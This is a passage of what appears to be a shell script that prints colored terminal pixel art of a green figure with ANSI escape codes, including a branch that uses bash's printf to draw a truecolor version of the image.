\e[38;5;76;48;5;233m▓\e[38;5;119;48;5;238m▓\e[38;5;119;48;5;151m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;246;48;5;246m▓\e[0m + \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m \e[38;5;22;48;5;232m \e[38;5;119;48;5;237m▓\e[38;5;113;48;5;251m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[38;5;231;48;5;231m▓\e[0m + \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;22;48;5;16m \e[38;5;22;48;5;16m \e[0m + \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;236m▒\e[0m + \e[38;5;119;48;5;70m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;114;48;5;235m▒\e[0m + \e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;28m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;232m \e[0m + \e[38;5;119;48;5;2m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m░\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;234m▒\e[0m + \e[38;5;119;48;5;237m▒\e[38;5;22;48;5;232m \e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m░\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;113;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;113;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;239m▒\e[38;5;22;48;5;232m░\e[38;5;119;48;5;235m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m \e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;2m░\e[38;5;119;48;5;64m▒\e[38;5;22;48;5;16m \e[38;5;119;48;5;236m▒\e[38;5;119;48;5;235m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;239m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;236m▒\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;233m░\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;234m▒\e[38;5;119;48;5;234m▒\e[38;5;119;48;5;234m░\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;233m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;22;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m + \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;233m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;70m▒\e[38;5;119;48;5;234m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m + '"; + + else + if [ -f "/bin/bash" ]; then + /bin/bash -c "printf ' + \e[48;2;194;194;194m\e[38;2;26;43;21m▄\e[48;2;159;158;159m\e[38;2;58;91;50m▄\e[48;2;130;130;130m\e[38;2;68;119;56m▄\e[48;2;116;117;116m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[48;2;134;134;134m\e[38;2;38;67;32m▄\e[48;2;164;164;164m\e[38;2;20;35;16m▄\e[48;2;188;187;188m\e[38;2;10;20;8m▄\e[48;2;223;223;223m\e[38;2;15;21;13m▄\e[0m + \e[48;2;230;230;230m\e[38;2;49;80;41m▄\e[48;2;132;132;133m\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[48;2;118;118;118m\e[38;2;70;125;56m▄\e[48;2;234;234;234m\e[38;2;30;45;26m▄\e[0m + \e[48;2;216;216;216m\e[38;2;42;65;36m▄\e[48;2;159;159;159m\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[48;2;161;161;161m\e[38;2;48;84;39m▄\e[0m + \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m 